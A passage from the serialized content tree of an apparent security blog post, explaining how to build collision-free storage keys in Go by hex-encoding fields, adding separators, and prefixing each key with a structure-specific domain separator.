AddressMap",{"type":25,"tag":216,"props":90200,"children":90201},{"style":6953},[90202],{"type":31,"value":89089},{"type":25,"tag":216,"props":90204,"children":90205},{"class":6922,"line":7613},[90206,90210,90214,90218,90222,90226,90230,90234,90238,90242,90246,90251,90255],{"type":25,"tag":216,"props":90207,"children":90208},{"style":6936},[90209],{"type":31,"value":89097},{"type":25,"tag":216,"props":90211,"children":90212},{"style":6964},[90213],{"type":31,"value":7701},{"type":25,"tag":216,"props":90215,"children":90216},{"style":7375},[90217],{"type":31,"value":89106},{"type":25,"tag":216,"props":90219,"children":90220},{"style":6964},[90221],{"type":31,"value":19368},{"type":25,"tag":216,"props":90223,"children":90224},{"style":6936},[90225],{"type":31,"value":71071},{"type":25,"tag":216,"props":90227,"children":90228},{"style":6964},[90229],{"type":31,"value":7701},{"type":25,"tag":216,"props":90231,"children":90232},{"style":7375},[90233],{"type":31,"value":89123},{"type":25,"tag":216,"props":90235,"children":90236},{"style":6964},[90237],{"type":31,"value":19368},{"type":25,"tag":216,"props":90239,"children":90240},{"style":6936},[90241],{"type":31,"value":71071},{"type":25,"tag":216,"props":90243,"children":90244},{"style":6964},[90245],{"type":31,"value":7701},{"type":25,"tag":216,"props":90247,"children":90248},{"style":7375},[90249],{"type":31,"value":90250},"AddressName",{"type":25,"tag":216,"props":90252,"children":90253},{"style":6964},[90254],{"type":31,"value":19368},{"type":25,"tag":216,"props":90256,"children":90257},{"style":7375},[90258],{"type":31,"value":90259},"Address\n",{"type":25,"tag":38,"props":90261,"children":90262},{},[90263],{"type":31,"value":90264},"Referencing previous examples, it is necessary to sanitize/encode each key field and add seperators between fields to prevent key collisions. By putting these measures into practice, we present the following implementation below:",{"type":25,"tag":206,"props":90266,"children":90268},{"code":90267,"language":80136,"meta":7,"className":80137,"style":7},"const (\n    Seperator = \"|\"\n)\n\n\nfunc PositionMapKey(\n    vaultId uint64,\n    username, positionName []byte,\n) (key []byte) {\n    usernameEncoded := make(\n        []byte,\n        hex.EncodedLen(len(username)),\n    )\n    hex.Encode(usernameEncoded, username)\n\n    positionNameEncoded := make(\n        []byte,\n        hex.EncodedLen(len(positionName)),\n    )\n    hex.Encode(positionNameEncoded, positionName)\n\n    key := fmt.Sprintf(\n        \"%d%s%s%s%s\",\n        vaultId,\n        Seperator,\n        usernameEncoded,\n        Seperator,\n        positionNameEncoded,\n    )\n}\n\n\nfunc AddressMapKey(\n    vaultId uint64,\n    username, addressName []byte\n) (key []byte) {\n    usernameEncoded := make(\n        []byte,\n        hex.EncodedLen(len(username)),\n    )\n    hex.Encode(usernameEncoded, username)\n\n    addressNameEncoded := make(\n        []byte,\n        hex.EncodedLen(len(addressName)),\n    )\n    hex.Encode(addressNameEncoded, addressName)\n\n    key := fmt.Sprintf(\n        \"%d%s%s%s%s\",\n        vaultId,\n        Seperator,\n        usernameEncoded,\n        Seperator,\n        addressNameEncoded,\n    )\n}\n",[90269],{"type":25,"tag":82,"props":90270,"children":90271},{"__ignoreMap":7},[90272,90283,90298,90305,90312,90319,90335,90350,90377,90400,90419,90435,90471,90478,90513,90520,90540,90555,90590,90597,90632,90639,90667,90679,90691,90703,90715,90726,90738,90745,90752,90759,90766,90782,90797,90821,90844,90863,90878,90913,90920,90955,90962,90982,90997,91032,91039,91075,91082,91109,91120,91131,91142,91153,91164,91176,91183],{"type":25,"tag":216,"props":90273,"children":90274},{"class":6922,"line":6923},[90275,90279],{"type":25,"tag":216,"props":90276,"children":90277},{"style":6936},[90278],{"type":31,"value":13611},{"type":25,"tag":216,"props":90280,"children":90281},{"style":6964},[90282],{"type":31,"value":82538},{"type":25,"tag":216,"props":90284,"children":90285},{"class":6922,"line":6769},[90286,90290,90294],{"type":25,"tag":216,"props":90287,"children":90288},{"style":6947},[90289],{"type":31,"value":89302},{"type":25,"tag":216,"props":90291,"children":90292},{"style":6953},[90293],{"type":31,"value":6956},{"type":25,"tag":216,"props":90295,"children":90296},{"style":8205},[90297],{"type":31,"value":89311},{"type":25,"tag":216,"props":90299,"children":90300},{"class":6922,"line":6778},[90301],{"type":25,"tag":216,"props":90302,"children":90303},{"style":6964},[90304],{"type":31,"value":7107},{"type":25,"tag":216,"props":90306,"children":90307},{"class":6922,"line":7005},[90308],{"type":25,"tag":216,"props":90309,"children":90310},{"emptyLinePlaceholder":16},[90311],{"type":31,"value":7642},{"type":25,"tag":216,"props":90313,"children":90314},{"class":6922,"line":7110},[90315],{"type":25,"tag":216,"props":90316,"children":90317},{"emptyLinePlaceholder":16},[90318],{"type":31,"value":7642},{"type":25,"tag":216,"props":90320,"children":90321},{"class":6922,"line":7216},[90322,90326,90331],{"type":25,"tag":216,"props":90323,"children":90324},{"style":6936},[90325],{"type":31,"value":80272},{"type":25,"tag":216,"props":90327,"children":90328},{"style":7047},[90329],{"type":31,"value":90330}," PositionMapKey",{"type":25,"tag":216,"props":90332,"children":90333},{"style":6964},[90334],{"type":31,"value":7420},{"type":25,"tag":216,"props":90336,"children":90337},{"class":6922,"line":7244},[90338,90342,90346],{"type":25,"tag":216,"props":90339,"children":90340},{"style":6947},[90341],{"type":31,"value":89218},{"type":25,"tag":216,"props":90343,"children":90344},{"style":7375},[90345],{"type":31,"value":80393},{"type":25,"tag":216,"props":90347,"children":90348},{"style":6964},[90349],{"type":31,"value":7465},{"type":25,"tag":216,"props":90351,"children":90352},{"class":6922,"line":7257},[90353,90357,90361,90365,90369,90373],{"type":25,"tag":216,"props":90354,"children":90355},{"style":6947},[90356],{"type":31,"value":89230},{"type":25,"tag":216,"props":90358,"children":90359},{"style":6964},[90360],{"type":31,"value":7026},{"type":25,"tag":216,"props":90362,"children":90363},{"style":6947},[90364],{"type":31,"value":89711},{"type":25,"tag":216,"props":90366,"children":90367},{"style":6964},[90368],{"type":31,"value":80199},{"type":25,"tag":216,"props":90370,"children":90371},{"style":7375},[90372],{"type":31,"value":88736},{"type":25,"tag":216,"props":90374,"children":90375},{"style":6964},[90376],{"type":31,"value":7465},{"type":25,"tag":216,"props":90378,"children":90379},{"class":6922,"line":7275},[90380,90384,90388,90392,90396],{"type":25,"tag":216,"props":90381,"children":90382},{"style":6964},[90383],{"type":31,"value":80354},{"type":25,"tag":216,"props":90385,"children":90386},{"style":6947},[90387],{"type":31,"value":76126},{"type":25,"tag":216,"props":90389,"children":90390},{"style":6964},[90391],{"type":31,"value":80199},{"type":25,"tag":216,"props":90393,"children":90394},{"style":7375},[90395],{"type":31,"value":88736},{"type":25,"tag":216,"props":90397,"children":90398},{"style":6964},[90399],{"type":31,"value":18761},{"type":25,"tag":216,"props":90401,"children":90402},{"class":6922,"line":7296},[90403,90407,90411,90415],{"type":25,"tag":216,"props":90404,"children":90405},{"style":6947},[90406],{"type":31,"value":89832},{"type":25,"tag":216,"props":90408,"children":90409},{"style":6953},[90410],{"type":31,"value":80388},{"type":25,"tag":216,"props":90412,"children":90413},{"style":7047},[90414],{"type":31,"value":89535},{"type":25,"tag":216,"props":90416,"children":90417},{"style":6964},[90418],{"type":31,"value":7420},{"type":25,"tag":216,"props":90420,"children":90421},{"class":6922,"line":7305},[90422,90427,90431],{"type":25,"tag":216,"props":90423,"children":90424},{"style":6964},[90425],{"type":31,"value":90426},"        []",{"type":25,"tag":216,"props":90428,"children":90429},{"style":7375},[90430],{"type":31,"value":88736},{"type":25,"tag":216,"props":90432,"children":90433},{"style":6964},[90434],{"type":31,"value":7465},{"type":25,"tag":216,"props":90436,"children":90437},{"class":6922,"line":7557},[90438,90443,90447,90451,90455,90459,90463,90467],{"type":25,"tag":216,"props":90439,"children":90440},{"style":6947},[90441],{"type":31,"value":90442},"        hex",{"type":25,"tag":216,"props":90444,"children":90445},{"style":6964},[90446],{"type":31,"value":179},{"type":25,"tag":216,"props":90448,"children":90449},{"style":7047},[90450],{"type":31,"value":89572},{"type":25,"tag":216,"props":90452,"children":90453},{"style":6964},[90454],{"type":31,"value":1850},{"type":25,"tag":216,"props":90456,"children":90457},{"style":7047},[90458],{"type":31,"value":13094},{"type":25,"tag":216,"props":90460,"children":90461},{"style":6964},[90462],{"type":31,"value":1850},{"type":25,"tag":216,"props":90464,"children":90465},{"style":6947},[90466],{"type":31,"value":89442},{"type":25,"tag":216,"props":90468,"children":90469},{"style":6964},[90470],{"type":31,"value":89593},{"type":25,"tag":216,"props":90472,"children":90473},{"class":6922,"line":7574},[90474],{"type":25,"tag":216,"props":90475,"children":90476},{"style":6964},[90477],{"type":31,"value":27876},{"type":25,"tag":216,"props":90479,"children":90480},{"class":6922,"line":7591},[90481,90485,90489,90493,90497,90501,90505,90509],{"type":25,"tag":216,"props":90482,"children":90483},{"style":6947},[90484],{"type":31,"value":89563},{"type":25,"tag":216,"props":90486,"children":90487},{"style":6964},[90488],{"type":31,"value":179},{"type":25,"tag":216,"props":90490,"children":90491},{"style":7047},[90492],{"type":31,"value":89617},{"type":25,"tag":216,"props":90494,"children":90495},{"style":6964},[90496],{"type":31,"value":1850},{"type":25,"tag":216,"props":90498,"children":90499},{"style":6947},[90500],{"type":31,"value":89526},{"type":25,"tag":216,"props":90502,"children":90503},{"style":6964},[90504],{"type":31,"value":7026},{"type":25,"tag":216,"props":90506,"children":90507},{"style":6947},[90508],{"type":31,"value":89442},{"type":25,"tag":216,"props":90510,"children":90511},{"style":6964},[90512],{"type":31,"value":7107},{"type":25,"tag":216,"props":90514,"children":90515},{"class":6922,"line":7604},[90516],{"type":25,"tag":216,"props":90517,"children":90518},{"emptyLinePlaceholder":16},[90519],{"type":31,"value":7642},{"type":25,"tag":216,"props":90521,"children":90522},{"class":6922,"line":7613},[90523,90528,90532,90536],{"type":25,"tag":216,"props":90524,"children":90525},{"style":6947},[90526],{"type":31,"value":90527},"    positionNameEncoded",{"type":25,"tag":216,"props":90529,"children":90530},{"style":6953},[90531],{"type":31,"value":80388},{"type":25,"tag":216,"props":90533,"children":90534},{"style":7047},[90535],{"type":31,"value":89535},{"type":25,"tag":216,"props":90537,"children":90538},{"style":6964},[90539],{"type":31,"value":7420},{"type":25,"tag":216,"props":90541,"children":90542},{"class":6922,"line":7636},[90543,90547,90551],{"type":25,"tag":216,"props":90544,"children":90545},{"style":6964},[90546],{"type":31,"value":90426},{"type":25,"tag":216,"props":90548,"children":90549},{"style":7375},[90550],{"type":31,"value":88736},{"type":25,"tag":216,"props":90552,"children":90553},{"style":6964},[90554],{"type":31,"value":7465},{"type":25,"tag":216,"props":90556,"children":90557},{"class":6922,"line":7645},[90558,90562,90566,90570,90574,90578,90582,90586],{"type":25,"tag":216,"props":90559,"children":90560},{"style":6947},[90561],{"type":31,"value":90442},{"type":25,"tag":216,"props":90563,"children":90564},{"style":6964},[90565],{"type":31,"value":179},{"type":25,"tag":216,"props":90567,"children":90568},{"style":7047},[90569],{"type":31,"value":89572},{"type":25,"tag":216,"props":90571,"children":90572},{"style":6964},[90573],{"type":31,"value":1850},{"type":25,"tag":216,"props":90575,"children":90576},{"style":7047},[90577],{"type":31,"value":13094},{"type":25,"tag":216,"props":90579,"children":90580},{"style":6964},[90581],{"type":31,"value":1850},{"type":25,"tag":216,"props":90583,"children":90584},{"style":6947},[90585],{"type":31,"value":89711},{"type":25,"tag":216,"props":90587,"children":90588},{"style":6964},[90589],{"type":31,"value":89593},{"type":25,"tag":216,"props":90591,"children":90592},{"class":6922,"line":7654},[90593],{"type":25,"tag":216,"props":90594,"children":90595},{"style":6964},[90596],{"type":31,"value":27876},{"type":25,"tag":216,"props":90598,"children":90599},{"class":6922,"line":7722},[90600,90604,90608,90612,90616,90620,90624,90628],{"type":25,"tag":216,"props":90601,"children":90602},{"style":6947},[90603],{"type":31,"value":89563},{"type":25,"tag":216,"props":90605,"children":90606},{"style":6964},[90607],{"type":31,"value":179},{"type":25,"tag":216,"props":90609,"children":90610},{"style":7047},[90611],{"type":31,"value":89617},{"type":25,"tag":216,"props":90613,"children":90614},{"style":6964},[90615],{"type":31,"value":1850},{"type":25,"tag":216,"props":90617,"children":90618},{"style":6947},[90619],{"type":31,"value":89652},{"type":25,"tag":216,"props":90621,"children":90622},{"style":6964},[90623],{"type":31,"value":7026},{"type":25,"tag":216,"props":90625,"children":90626},{"style":6947},[90627],{"type":31,"value":89711},{"type":25,"tag":216,"props":90629,"children":90630},{"style":6964},[90631],{"type":31,"value":7107},{"type":25,"tag":216,"props":90633,"children":90634},{"class":6922,"line":7730},[90635],{"type":25,"tag":216,"props":90636,"children":90637},{"emptyLinePlaceholder":16},[90638],{"type":31,"value":7642},{"type":25,"tag":216,"props":90640,"children":90641},{"class":6922,"line":7760},[90642,90647,90651,90655,90659,90663],{"type":25,"tag":216,"props":90643,"children":90644},{"style":6947},[90645],{"type":31,"value":90646},"    key",{"type":25,"tag":216,"props":90648,"children":90649},{"style":6953},[90650],{"type":31,"value":80388},{"type":25,"tag":216,"props":90652,"children":90653},{"style":6947},[90654],{"type":31,"value":86206},{"type":25,"tag":216,"props":90656,"children":90657},{"style":6964},[90658],{"type":31,"value":179},{"type":25,"tag":216,"props":90660,"children":90661},{"style":7047},[90662],{"type":31,"value":89194},{"type":25,"tag":216,"props":90664,"children":90665},{"style":6964},[90666],{"type":31,"value":7420},{"type":25,"tag":216,"props":90668,"children":90669},{"class":6922,"line":7768},[90670,90675],{"type":25,"tag":216,"props":90671,"children":90672},{"style":8205},[90673],{"type":31,"value":90674},"        \"%d%s%s%s%s\"",{"type":25,"tag":216,"props":90676,"children":90677},{"style":6964},[90678],{"type":31,"value":7465},{"type":25,"tag":216,"props":90680,"children":90681},{"class":6922,"line":7800},[90682,90687],{"type":25,"tag":216,"props":90683,"children":90684},{"style":6947},[90685],{"type":31,"value":90686},"        vaultId",{"type":25,"tag":216,"props":90688,"children":90689},{"style":6964},[90690],{"type":31,"value":7465},{"type":25,"tag":216,"props":90692,"children":90693},{"class":6922,"line":7808},[90694,90699],{"type":25,"tag":216,"props":90695,"children":90696},{"style":6947},[90697],{"type":31,"value":90698},"        Seperator",{"type":25,"tag":216,"props":90700,"children":90701},{"style":6964},[90702],{"type":31,"value":7465},{"type":25,"tag":216,"props":90704,"children":90705},{"class":6922,"line":7868},[90706,90711],{"type":25,"tag":216,"props":90707,"children":90708},{"style":6947},[90709],{"type":31,"value":90710},"        usernameEncoded",{"type":25,"tag":216,"props":90712,"children":90713},{"style":6964},[90714],{"type":31,"value":7465},{"type":25,"tag":216,"props":90716,"children":90717},{"class":6922,"line":13001},[90718,90722],{"type":25,"tag":216,"props":90719,"children":90720},{"style":6947},[90721],{"type":31,"value":90698},{"type":25,"tag":216,"props":90723,"children":90724},{"style":6964},[90725],{"type":31,"value":7465},{"type":25,"tag":216,"props":90727,"children":90728},{"class":6922,"line":13019},[90729,90734],{"type":25,"tag":216,"props":90730,"children":90731},{"style":6947},[90732],{"type":31,"value":90733},"        positionNameEncoded",{"type":25,"tag":216,"props":90735,"children":90736},{"style":6964},[90737],{"type":31,"value":7465},{"type":25,"tag":216,"props":90739,"children":90740},{"class":6922,"line":13064},[90741],{"type":25,"tag":216,"props":90742,"children":90743},{"style":6964},[90744],{"type":31,"value":27876},{"type":25,"tag":216,"props":90746,"children":90747},{"class":6922,"line":13170},[90748],{"type":25,"tag":216,"props":90749,"children":90750},{"style":6964},[90751],{"type":31,"value":7874},{"type":25,"tag":216,"props":90753,"children":90754},{"class":6922,"line":27455},[90755],{"type":25,"tag":216,"props":90756,"children":90757},{"emptyLinePlaceholder":16},[90758],{"type":31,"value":7642},{"type":25,"tag":216,"props":90760,"children":90761},{"class":6922,"line":27490},[90762],{"type":25,"tag":216,"props":90763,"children":90764},{"emptyLinePlaceholder":16},[90765],{"type":31,"value":7642},{"type":25,"tag":216,"props":90767,"children":90768},{"class":6922,"line":27498},[90769,90773,90778],{"type":25,"tag":216,"props":90770,"children":90771},{"style":6936},[90772],{"type":31,"value":80272},{"type":25,"tag":216,"props":90774,"children":90775},{"style":7047},[90776],{"type":31,"value":90777}," AddressMapKey",{"type":25,"tag":216,"props":90779,"children":90780},{"style":6964},[90781],{"type":31,"value":7420},{"type":25,"tag":216,"props":90783,"children":90784},{"class":6922,"line":27506},[90785,90789,90793],{"type":25,"tag":216,"props":90786,"children":90787},{"style":6947},[90788],{"type":31,"value":89218},{"type":25,"tag":216,"props":90790,"children":90791},{"style":7375},[90792],{"type":31,"value":80393},{"type":25,"tag":216,"props":90794,"children":90795},{"style":6964},[90796],{"type":31,"value":7465},{"type":25,"tag":216,"props":90798,"children":90799},{"class":6922,"line":27515},[90800,90804,90808,90813,90817],{"type":25,"tag":216,"props":90801,"children":90802},{"style":6947},[90803],{"type":31,"value":89230},{"type":25,"tag":216,"props":90805,"children":90806},{"style":6964},[90807],{"type":31,"value":7026},{"type":25,"tag":216,"props":90809,"children":90810},{"style":6947},[90811],{"type":31,"value":90812},"addressName",{"type":25,"tag":216,"props":90814,"children":90815},{"style":6964},[90816],{"type":31,"value":80199},{"type":25,"tag":216,"props":90818,"children":90819},{"style":7375},[90820],{"type":31,"value":88200},{"type":25,"tag":216,"props":90822,"children":90823},{"class":6922,"line":27557},[90824,90828,90832,90836,90840],{"type":25,"tag":216,"props":90825,"children":90826},{"style":6964},[90827],{"type":31,"value":80354},{"type":25,"tag":216,"props":90829,"children":90830},{"style":6947},[90831],{"type":31,"value":76126},{"type":25,"tag":216,"props":90833,"children":90834},{"style":6964},[90835],{"type":31,"value":80199},{"type":25,"tag":216,"props":90837,"children":90838},{"style":7375},[90839],{"type":31,"value":88736},{"type":25,"tag":216,"props":90841,"children":90842},{"style":6964},[90843],{"type":31,"value":18761},{"type":25,"tag":216,"props":90845,"children":90846},{"class":6922,"line":27590},[90847,90851,90855,90859],{"type":25,"tag":216,"props":90848,"children":90849},{"style":6947},[90850],{"type":31,"value":89832},{"type":25,"tag":216,"props":90852,"children":90853},{"style":6953},[90854],{"type":31,"value":80388},{"type":25,"tag":216,"props":90856,"children":90857},{"style":7047},[90858],{"type":31,"value":89535},{"type":25,"tag":216,"props":90860,"children":90861},{"style":6964},[90862],{"type":31,"value":7420},{"type":25,"tag":216,"props":90864,"children":90865},{"class":6922,"line":27598},[90866,90870,90874],{"type":25,"tag":216,"props":90867,"children":90868},{"style":6964},[90869],{"type":31,"value":90426},{"type":25,"tag":216,"props":90871,"children":90872},{"style":7375},[90873],{"type":31,"value":88736},{"type":25,"tag":216,"props":90875,"children":90876},{"style":6964},[90877],{"type":31,"value":7465},{"type":25,"tag":216,"props":90879,"children":90880},{"class":6922,"line":27606},[90881,90885,90889,90893,90897,90901,90905,90909],{"type":25,"tag":216,"props":90882,"children":90883},{"style":6947},[90884],{"type":31,"value":90442},{"type":25,"tag":216,"props":90886,"children":90887},{"style":6964},[90888],{"type":31,"value":179},{"type":25,"tag":216,"props":90890,"children":90891},{"style":7047},[90892],{"type":31,"value":89572},{"type":25,"tag":216,"props":90894,"children":90895},{"style":6964},[90896],{"type":31,"value":1850},{"type":25,"tag":216,"props":90898,"children":90899},{"style":7047},[90900],{"type":31,"value":13094},{"type":25,"tag":216,"props":90902,"children":90903},{"style":6964},[90904],{"type":31,"value":1850},{"type":25,"tag":216,"props":90906,"children":90907},{"style":6947},[90908],{"type":31,"value":89442},{"type":25,"tag":216,"props":90910,"children":90911},{"style":6964},[90912],{"type":31,"value":89593},{"type":25,"tag":216,"props":90914,"children":90915},{"class":6922,"line":27615},[90916],{"type":25,"tag":216,"props":90917,"children":90918},{"style":6964},[90919],{"type":31,"value":27876},{"type":25,"tag":216,"props":90921,"children":90922},{"class":6922,"line":27691},[90923,90927,90931,90935,90939,90943,90947,90951],{"type":25,"tag":216,"props":90924,"children":90925},{"style":6947},[90926],{"type":31,"value":89563},{"type":25,"tag":216,"props":90928,"children":90929},{"style":6964},[90930],{"type":31,"value":179},{"type":25,"tag":216,"props":90932,"children":90933},{"style":7047},[90934],{"type":31,"value":89617},{"type":25,"tag":216,"props":90936,"children":90937},{"style":6964},[90938],{"type":31,"value":1850},{"type":25,"tag":216,"props":90940,"children":90941},{"style":6947},[90942],{"type":31,"value":89526},{"type":25,"tag":216,"props":90944,"children":90945},{"style":6964},[90946],{"type":31,"value":7026},{"type":25,"tag":216,"props":90948,"children":90949},{"style":6947},[90950],{"type":31,"value":89442},{"type":25,"tag":216,"props":90952,"children":90953},{"style":6964},[90954],{"type":31,"value":7107},{"type":25,"tag":216,"props":90956,"children":90957},{"class":6922,"line":27724},[90958],{"type":25,"tag":216,"props":90959,"children":90960},{"emptyLinePlaceholder":16},[90961],{"type":31,"value":7642},{"type":25,"tag":216,"props":90963,"children":90964},{"class":6922,"line":27732},[90965,90970,90974,90978],{"type":25,"tag":216,"props":90966,"children":90967},{"style":6947},[90968],{"type":31,"value":90969},"    addressNameEncoded",{"type":25,"tag":216,"props":90971,"children":90972},{"style":6953},[90973],{"type":31,"value":80388},{"type":25,"tag":216,"props":90975,"children":90976},{"style":7047},[90977],{"type":31,"value":89535},{"type":25,"tag":216,"props":90979,"children":90980},{"style":6964},[90981],{"type":31,"value":7420},{"type":25,"tag":216,"props":90983,"children":90984},{"class":6922,"line":27740},[90985,90989,90993],{"type":25,"tag":216,"props":90986,"children":90987},{"style":6964},[90988],{"type":31,"value":90426},{"type":25,"tag":216,"props":90990,"children":90991},{"style":7375},[90992],{"type":31,"value":88736},{"type":25,"tag":216,"props":90994,"children":90995},{"style":6964},[90996],{"type":31,"value":7465},{"type":25,"tag":216,"props":90998,"children":90999},{"class":6922,"line":27777},[91000,91004,91008,91012,91016,91020,91024,91028],{"type":25,"tag":216,"props":91001,"children":91002},{"style":6947},[91003],{"type":31,"value":90442},{"type":25,"tag":216,"props":91005,"children":91006},{"style":6964},[91007],{"type":31,"value":179},{"type":25,"tag":216,"props":91009,"children":91010},{"style":7047},[91011],{"type":31,"value":89572},{"type":25,"tag":216,"props":91013,"children":91014},{"style":6964},[91015],{"type":31,"value":1850},{"type":25,"tag":216,"props":91017,"children":91018},{"style":7047},[91019],{"type":31,"value":13094},{"type":25,"tag":216,"props":91021,"children":91022},{"style":6964},[91023],{"type":31,"value":1850},{"type":25,"tag":216,"props":91025,"children":91026},{"style":6947},[91027],{"type":31,"value":90812},{"type":25,"tag":216,"props":91029,"children":91030},{"style":6964},[91031],{"type":31,"value":89593},{"type":25,"tag":216,"props":91033,"children":91034},{"class":6922,"line":27790},[91035],{"type":25,"tag":216,"props":91036,"children":91037},{"style":6964},[91038],{"type":31,"value":27876},{"type":25,"tag":216,"props":91040,"children":91041},{"class":6922,"line":27803},[91042,91046,91050,91054,91058,91063,91067,91071],{"type":25,"tag":216,"props":91043,"children":91044},{"style":6947},[91045],{"type":31,"value":89563},{"type":25,"tag":216,"props":91047,"children":91048},{"style":6964},[91049],{"type":31,"value":179},{"type":25,"tag":216,"props":91051,"children":91052},{"style":7047},[91053],{"type":31,"value":89617},{"type":25,"tag":216,"props":91055,"children":91056},{"style":6964},[91057],{"type":31,"value":1850},{"type":25,"tag":216,"props":91059,"children":91060},{"style":6947},[91061],{"type":31,"value":91062},"addressNameEncoded",{"type":25,"tag":216,"props":91064,"children":91065},{"style":6964},[91066],{"type":31,"value":7026},{"type":25,"tag":216,"props":91068,"children":91069},{"style":6947},[91070],{"type":31,"value":90812},{"type":25,"tag":216,"props":91072,"children":91073},{"style":6964},[91074],{"type":31,"value":7107},{"type":25,"tag":216,"props":91076,"children":91077},{"class":6922,"line":27816},[91078],{"type":25,"tag":216,"props":91079,"children":91080},{"emptyLinePlaceholder":16},[91081],{"type":31,"value":7642},{"type":25,"tag":216,"props":91083,"children":91084},{"class":6922,"line":27870},[91085,91089,91093,91097,91101,91105],{"type":25,"tag":216,"props":91086,"children":91087},{"style":6947},[91088],{"type":31,"value":90646},{"type":25,"tag":216,"props":91090,"children":91091},{"style":6953},[91092],{"type":31,"value":80388},{"type":25,"tag":216,"props":91094,"children":91095},{"style":6947},[91096],{"type":31,"value":86206},{"type":25,"tag":216,"props":91098,"children":91099},{"style":6964},[91100],{"type":31,"value":179},{"type":25,"tag":216,"props":91102,"children":91103},{"style":7047},[91104],{"type":31,"value":89194},{"type":25,"tag":216,"props":91106,"children":91107},{"style":6964},[91108],{"type":31,"value":7420},{"type":25,"tag":216,"props":91110,"children":91111},{"class":6922,"line":27879},[91112,91116],{"type":25,"tag":216,"props":91113,"children":91114},{"style":8205},[91115],{"type":31,"value":90674},{"type":25,"tag":216,"props":91117,"children":91118},{"style":6964},[91119],{"type":31,"value":7465},{"type":25,"tag":216,"props":91121,"children":91122},{"class":6922,"line":36243},[91123,91127],{"type":25,"tag":216,"props":91124,"children":91125},{"style":6947},[91126],{"type":31,"value":90686},{"type":25,"tag":216,"props":91128,"children":91129},{"style":6964},[91130],{"type":31,"value":7465},{"type":25,"tag":216,"props":91132,"children":91133},{"class":6922,"line":36264},[91134,91138],{"type":25,"tag":216,"props":91135,"children":91136},{"style":6947},[91137],{"type":31,"value":90698},{"type":25,"tag":216,"props":91139,"children":91140},{"style":6964},[91141],{"type":31,"value":7465},{"type":25,"tag":216,"props":91143,"children":91144},{"class":6922,"line":84923},[91145,91149],{"type":25,"tag":216,"props":91146,"children":91147},{"style":6947},[91148],{"type":31,"value":90710},{"type":25,"tag":216,"props":91150,"children":91151},{"style":6964},[91152],{"type":31,"value":7465},{"type":25,"tag":216,"props":91154,"children":91155},{"class":6922,"line":84936},[91156,91160],{"type":25,"tag":216,"props":91157,"children":91158},{"style":6947},[91159],{"type":31,"value":90698},{"type":25,"tag":216,"props":91161,"children":91162},{"style":6964},[91163],{"type":31,"value":7465},{"type":25,"tag":216,"props":91165,"children":91166},{"class":6922,"line":84944},[91167,91172],{"type":25,"tag":216,"props":91168,"children":91169},{"style":6947},[91170],{"type":31,"value":91171},"        addressNameEncoded",{"type":25,"tag":216,"props":91173,"children":91174},{"style":6964},[91175],{"type":31,"value":7465},{"type":25,"tag":216,"props":91177,"children":91178},{"class":6922,"line":84952},[91179],{"type":25,"tag":216,"props":91180,"children":91181},{"style":6964},[91182],{"type":31,"value":27876},{"type":25,"tag":216,"props":91184,"children":91185},{"class":6922,"line":84960},[91186],{"type":25,"tag":216,"props":91187,"children":91188},{"style":6964},[91189],{"type":31,"value":7874},{"type":25,"tag":38,"props":91191,"children":91192},{},[91193,91195,91200],{"type":31,"value":91194},"Unfortunately, when dealing with more than one storage entry within the same ",{"type":25,"tag":82,"props":91196,"children":91198},{"className":91197},[],[91199],{"type":31,"value":88948},{"type":31,"value":91201},", the previous implementation is not enough to guarantee key uniqueness. While it still effectively prevents key collisions within each individual structure, it does not prevent cross-structure key collisions.",{"type":25,"tag":206,"props":91203,"children":91205},{"code":91204},"vaultId = 1, username = \"a\", positionName = \"b\"\n    => PositionMapKey = \"1|a|b\"\n\nvaultId = 1, username = \"a\", addressName = \"b\"\n    => AddressMapKey = \"1|a||b\"\n",[91206],{"type":25,"tag":82,"props":91207,"children":91208},{"__ignoreMap":7},[91209],{"type":31,"value":91204},{"type":25,"tag":38,"props":91211,"children":91212},{},[91213],{"type":31,"value":91214},"To prevent this, add a structure-specific prefix to the start of each key to act as a domain separator.",{"type":25,"tag":206,"props":91216,"children":91218},{"code":91217,"language":80136,"meta":7,"className":80137,"style":7},"const (\n    Seperator = \"|\"\n    PositionMapPrefix = \"\\x01\"\n    AddressMapPrefix = \"\\x02\"\n)\n\n\nfunc PositionMapKey(\n    vaultId uint64,\n    username, positionName []byte,\n) (key []byte) {\n    usernameEncoded := make(\n        []byte,\n        hex.EncodedLen(len(username)),\n    )\n    hex.Encode(usernameEncoded, username)\n\n    positionNameEncoded := make(\n        []byte,\n        hex.EncodedLen(len(positionName)),\n    )\n    hex.Encode(positionNameEncoded, positionName)\n\n    key := fmt.Sprintf(\n        \"%s%d%s%s%s%s\",\n        PositionMapPrefix,\n        vaultId,\n        Seperator,\n        usernameEncoded,\n        Seperator,\n        positionNameEncoded,\n    )\n}\n\n\nfunc AddressMapKey(\n    vaultId uint64,\n    username, addressName []byte,\n) (key []byte) {\n    usernameEncoded := make(\n        []byte,\n        hex.EncodedLen(len(username)),\n    )\n    hex.Encode(usernameEncoded, username)\n\n    addressNameEncoded := make(\n        []byte,\n        hex.EncodedLen(len(addressName)),\n    )\n    hex.Encode(addressNameEncoded, addressName)\n\n    key := fmt.Sprintf(\n        \"%s%d%s%s%s%s\",\n        AddressMapPrefix,\n        vaultId,\n        Seperator,\n        usernameEncoded,\n        Seperator,\n        addressNameEncoded,\n    )\n}\n",[91219],{"type":25,"tag":82,"props":91220,"children":91221},{"__ignoreMap":7},[91222,91233,91248,91275,91300,91307,91314,91321,91336,91351,91378,91401,91420,91435,91470,91477,91512,91519,91538,91553,91588,91595,91630,91637,91664,91676,91688,91699,91710,91721,91732,91743,91750,91757,91764,91771,91786,91801,91828,91851,91870,91885,91920,91927,91962,91969,91988,92003,92038,92045,92080,92087,92114,92125,92137,92148,92159,92170,92181,92192,92200],{"type":25,"tag":216,"props":91223,"children":91224},{"class":6922,"line":6923},[91225,91229],{"type":25,"tag":216,"props":91226,"children":91227},{"style":6936},[91228],{"type":31,"value":13611},{"type":25,"tag":216,"props":91230,"children":91231},{"style":6964},[91232],{"type":31,"value":82538},{"type":25,"tag":216,"props":91234,"children":91235},{"class":6922,"line":6769},[91236,91240,91244],{"type":25,"tag":216,"props":91237,"children":91238},{"style":6947},[91239],{"type":31,"value":89302},{"type":25,"tag":216,"props":91241,"children":91242},{"style":6953},[91243],{"type":31,"value":6956},{"type":25,"tag":216,"props":91245,"children":91246},{"style":8205},[91247],{"type":31,"value":89311},{"type":25,"tag":216,"props":91249,"children":91250},{"class":6922,"line":6778},[91251,91256,91260,91265,91270],{"type":25,"tag":216,"props":91252,"children":91253},{"style":6947},[91254],{"type":31,"value":91255},"    